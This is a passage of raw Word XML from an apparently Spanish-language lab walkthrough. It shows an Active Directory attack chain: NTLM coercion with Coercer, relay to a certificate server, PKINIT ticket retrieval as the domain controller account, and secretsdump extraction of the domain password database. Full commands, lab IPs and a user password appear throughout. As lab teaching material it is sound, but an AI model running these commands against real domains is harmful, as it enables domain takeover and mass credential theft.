    <w:p w14:paraId="3401652A" w14:textId="27EF3301" w:rsidR="0097337F" w:rsidRDefault="007F4577" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E847406" wp14:editId="194AEDCF">
            <wp:extent cx="5400040" cy="5078095"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="49134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9104" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5078095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EF4E11" w14:textId="77777777" w:rsidR="0020238E" w:rsidRDefault="0020238E" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BE9A1F" w14:textId="0B6F1E67" w:rsidR="0020238E" w:rsidRDefault="0020238E" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora ejecutaremos Coerce con las credenciales del usuario Alesander ‘abc123.’ :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0482C8" w14:textId="77777777" w:rsidR="0020238E" w:rsidRDefault="0020238E" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C4F2891" w14:textId="32069D82" w:rsidR="0020238E" w:rsidRPr="0097337F" w:rsidRDefault="0020238E" w:rsidP="0097337F">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42D54F15" wp14:editId="6C78C5AF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="67945"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="950725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05553CB5" w14:textId="0910B342" w:rsidR="0020238E" w:rsidRDefault="007F4577">
                            <w:r w:rsidRPr="007F4577">
                              <w:t>python3 Coercer.py coerce -l 192.168.1.44 -t 192.168.1.80 -u Alesander -p abc123. -d google.local  --always-continue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D54F15" id="_x0000_s1039" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:25168179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&#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BjO1Ry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05553CB5" w14:textId="0910B342" w:rsidR="0020238E" w:rsidRDefault="007F4577">
                      <w:r w:rsidRPr="007F4577">
                        <w:t>python3 Coercer.py coerce -l 192.168.1.44 -t 192.168.1.80 -u Alesander -p abc123. -d google.local  --always-continue   -v</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D7F11B" w14:textId="77777777" w:rsidR="008125BC" w:rsidRDefault="008125BC" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C15785D" w14:textId="77777777" w:rsidR="0020238E" w:rsidRDefault="0020238E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018F2ABB" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DBDBEA" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F8EA07" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB234FC" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED070FA" w14:textId="01731CF9" w:rsidR="00F51705" w:rsidRDefault="0020238E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Siendo -u el nombre de usuario, -p la contraseña, -d el dominio, </w:t>
      </w:r>
      <w:r w:rsidR="007F4577">
        <w:t>-l la IP que va escuchar y a la que se le enviaran los hashes, -t la IP del objetivo, en este caso el servidor dos de Windows server, --always-continue para que haga el ataque sin preguntar nada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CF271" w14:textId="77777777" w:rsidR="007F4577" w:rsidRDefault="007F4577" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C70B96D" w14:textId="141976ED" w:rsidR="00F51705" w:rsidRDefault="007F4577" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF40E9B" wp14:editId="13513870">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="469946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46561" name=""/>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32BB9554" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350ADB35" w14:textId="4ACE52A2" w:rsidR="00F51705" w:rsidRDefault="00B17535" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Consiguiendo el token:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C6FBA8" w14:textId="77777777" w:rsidR="00B17535" w:rsidRDefault="00B17535" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E3066C" w14:textId="19C34B86" w:rsidR="00B17535" w:rsidRDefault="00B17535" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74351790" wp14:editId="7E22E89A">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1606688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88507" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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2AF8BD8E" w14:textId="77777777" w:rsidR="00F51705" w:rsidRDefault="00F51705" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681F6D38" w14:textId="056B9609" w:rsidR="00F51705" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora conseguiremos el certificado de la autentificación del servidor dos en nuestra máquina atacante, en el servidor de certificados del servidor uno</w:t>
      </w:r>
      <w:r w:rsidR="007F4577">
        <w:t>. Ntlmrelax.py está esperando a que le llegue algún hash para enviárselo al servidor de certificados, en este caso el servidor uno, cuando eso ocurra mostrará el certificado</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E235E" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A019DF2" w14:textId="6A2F379A" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30750050" wp14:editId="1BC97A87">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="588468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68825" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317D8AC" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6384C7B7" w14:textId="2D87210C" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora copiare el certificado encriptado en base64 en un fichero llamado cert.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1374D" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29BB9121" w14:textId="671EDCF7" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260FE5D2" wp14:editId="5567FD87">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="143955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5007" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"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A25EFE7" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474CC12A" w14:textId="5A762967" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="021F2AAA" wp14:editId="01CEEA16">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="86404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43717" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143"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15397C2D" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FEA157" w14:textId="53CA9084" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora desencriptaremos el fichero cert.txt, para eso lo convertiremos en un .pfx, que será el tipo de fichero que tendremos que usar después:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C76B8C5" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBB1C39" w14:textId="42EE8589" w:rsidR="00B95BC1" w:rsidRDefault="007D3833" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5385A5DF" wp14:editId="38FD9290">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="11940508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34D709F4" w14:textId="3E7E69BA" w:rsidR="007D3833" w:rsidRDefault="007D3833">
                            <w:r w:rsidRPr="007D3833">
                              <w:t>cat cert.txt | base64 -d &gt; cert.pf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85A5DF" id="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516838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34D709F4" w14:textId="3E7E69BA" w:rsidR="007D3833" w:rsidRDefault="007D3833">
                      <w:r w:rsidRPr="007D3833">
                        <w:t>cat cert.txt | base64 -d &gt; cert.pfx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3C9B30" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725166A1" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE5F61E" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220AB06F" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4240878B" w14:textId="3FB64BAF" w:rsidR="00B95BC1" w:rsidRDefault="007D3833" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F824467" wp14:editId="31A0EBC4">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50568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0452" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144"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87BE69D" w14:textId="77777777" w:rsidR="007D3833" w:rsidRDefault="007D3833" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106E16B8" w14:textId="72FE49E0" w:rsidR="007D3833" w:rsidRDefault="007D3833" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo que intentaremos hacer es usar este certificado .pfx, para autentificarnos en el controlador de dominio</w:t>
      </w:r>
      <w:r w:rsidR="009830E6">
        <w:t xml:space="preserve"> y así obtener el ticket de kerberos,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para eso voy usar una herramienta que se llama</w:t>
      </w:r>
      <w:r w:rsidR="004C30A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C30A7" w:rsidRPr="004C30A7">
        <w:t>gettgtpkinit.py</w:t>
      </w:r>
      <w:r w:rsidR="004C30A7">
        <w:t xml:space="preserve">, perteneciente al paquete </w:t>
      </w:r>
      <w:r w:rsidR="004C30A7" w:rsidRPr="004C30A7">
        <w:t>PKINITtools</w:t>
      </w:r>
      <w:r w:rsidR="004C30A7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839C182" w14:textId="66812110" w:rsidR="00B95BC1" w:rsidRDefault="004C30A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02DE4679" wp14:editId="697B920E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1085517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731C63D8" w14:textId="37C2FC6E" w:rsidR="004C30A7" w:rsidRDefault="004C30A7">
                            <w:r w:rsidRPr="004C30A7">
                              <w:t>sudo python3 gettgtpkinit.py google.local/DC02\$ -cert-pfx /home/parrot/cert.pfx out.ccach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DE4679" id="_x0000_s1041" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516858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731C63D8" w14:textId="37C2FC6E" w:rsidR="004C30A7" w:rsidRDefault="004C30A7">
                      <w:r w:rsidRPr="004C30A7">
                        <w:t>sudo python3 gettgtpkinit.py google.local/DC02\$ -cert-pfx /home/parrot/cert.pfx out.ccache</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4A6776" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F9AE8A" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F7D39E" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3DA259" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F9D3323" w14:textId="77777777" w:rsidR="00B95BC1" w:rsidRDefault="00B95BC1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB6F89E" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70152E57" w14:textId="0C57FB41" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="264EA317" wp14:editId="4915C446">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1964914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14035" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"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D6A1829" w14:textId="77777777" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B1F68E" w14:textId="405857FE" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="183488B6" wp14:editId="40DA7D0B">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1190446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46353" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146"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32BA5B3" w14:textId="77777777" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D12A0DE" w14:textId="329D75DF" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora podremos pasarnos por el controlador de dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1DC9E" w14:textId="77777777" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E2E890" w14:textId="3D18DAFF" w:rsidR="00EE3822" w:rsidRDefault="002E129B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para eso, usaré</w:t>
      </w:r>
      <w:r w:rsidR="00EE3822">
        <w:t xml:space="preserve">  esta herramienta de impacket </w:t>
      </w:r>
      <w:r w:rsidR="00EE3822" w:rsidRPr="00EE3822">
        <w:t>secretsdump.py</w:t>
      </w:r>
      <w:r w:rsidR="00EE3822">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449A1073" w14:textId="77777777" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284CF993" w14:textId="07AB89E7" w:rsidR="00EE3822" w:rsidRDefault="004306A5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AD614D2" wp14:editId="3836FB30">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="87630" b="74295"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1474534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60972BB9" w14:textId="1EBF584C" w:rsidR="004306A5" w:rsidRDefault="004306A5">
                            <w:r w:rsidRPr="004306A5">
                              <w:t>KRB5CCNAME=out.ccache python3 ../impacket/examples/secretsdump.py -just-dc -user-status -debu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D614D2" id="_x0000_s1042" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516879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&#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ACq44W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60972BB9" w14:textId="1EBF584C" w:rsidR="004306A5" w:rsidRDefault="004306A5">
                      <w:r w:rsidRPr="004306A5">
                        <w:t>KRB5CCNAME=out.ccache python3 ../impacket/examples/secretsdump.py -just-dc -user-status -debug</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2556FA" w14:textId="77777777" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD91B83" w14:textId="77777777" w:rsidR="00EE3822" w:rsidRDefault="00EE3822" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6278102B" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375C35BB" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1FDC6D" w14:textId="77777777" w:rsidR="009916DA" w:rsidRDefault="009916DA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0332A896" w14:textId="26F8D6B4" w:rsidR="009916DA" w:rsidRDefault="004306A5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Cogiendo el archivo de cache generado por el anterior programa y ejecutando secretsdump.py, para poder bajar la base de datos con las contraseñas del controlador de dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3AA1BE" w14:textId="77777777" w:rsidR="004306A5" w:rsidRDefault="004306A5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596BE102" w14:textId="7521AFFB" w:rsidR="00C76E97" w:rsidRDefault="00F46135" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="286921A0" wp14:editId="643BD143">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
